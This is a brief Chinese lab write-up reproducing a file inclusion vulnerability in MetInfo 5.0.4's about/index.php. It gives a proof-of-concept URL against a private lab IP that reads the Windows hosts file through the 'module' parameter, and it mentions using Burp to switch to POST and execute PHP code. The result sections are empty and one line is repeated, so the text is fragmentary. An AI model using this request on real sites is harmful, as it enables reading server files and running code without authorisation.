[漏洞复现] MetInfo5.0.4文件包含漏洞
MetInfo5.0.4
漏洞代码审计
漏洞出现在about/index.php中,因为利用了动态地址,所以存在漏洞。
漏洞检查语句(!192.168.109.100是我的服务器ip,需要换成自己的):
http://192.168.109.100/MetInfo5.0.4/about/index.php?module=c:/windows/system32/drivers/etc/hosts&fmodule=7
结果:
漏洞利用
可以使用burp工具对漏洞进行利用
把GET模式改为POST,执行PHP代码
行利用
把GET模式改为POST,执行PHP代码